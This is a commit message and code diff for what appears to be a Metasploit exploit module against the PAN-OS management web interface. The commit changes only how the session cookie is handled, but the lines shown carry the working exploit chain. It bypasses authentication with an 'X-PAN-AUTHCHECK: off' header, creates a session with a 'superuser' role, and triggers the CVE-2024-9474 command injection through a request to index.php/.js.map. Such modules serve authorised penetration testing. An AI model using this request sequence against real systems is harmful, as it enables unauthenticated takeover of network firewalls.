use the HttpClient cookie jar. Thank you @jheysel-r7 for this improvement.

Author: sfewer-r7

modules/exploits/linux/http/panos_management_unauth_rce.rb

@@ -203,6 +203,7 @@ def execute_cmd(cmd, dontfail: false)
       'headers' => {
         'X-PAN-AUTHCHECK' => 'off'
       },
+      'keep_cookies' => true,
       'vars_post' => {
         'user' => user,
         'userRole' => 'superuser',
@@ -219,19 +220,15 @@ def execute_cmd(cmd, dontfail: false)
       fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /php/utils/createRemoteAppwebSession.php')
     end
 
-    php_session_id = res1.body.to_s.match(/PHPSESSID=([a-z0-9]+)@/)
-
-    unless php_session_id
+    unless cookie_jar.cookies.find { |c| c.name == 'PHPSESSID' }
       fail_with(Failure::UnexpectedReply, 'No PHPSESSID returned')
     end
 
     # Trigger the command injection (CVE-2024-9474).
     res2 = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri('index.php', '.js.map'),
-      'headers' => {
-        'Cookie' => "PHPSESSID=#{php_session_id[1]};"
-      }
+      'keep_cookies' => true
     )
 
     unless res2&.code == 200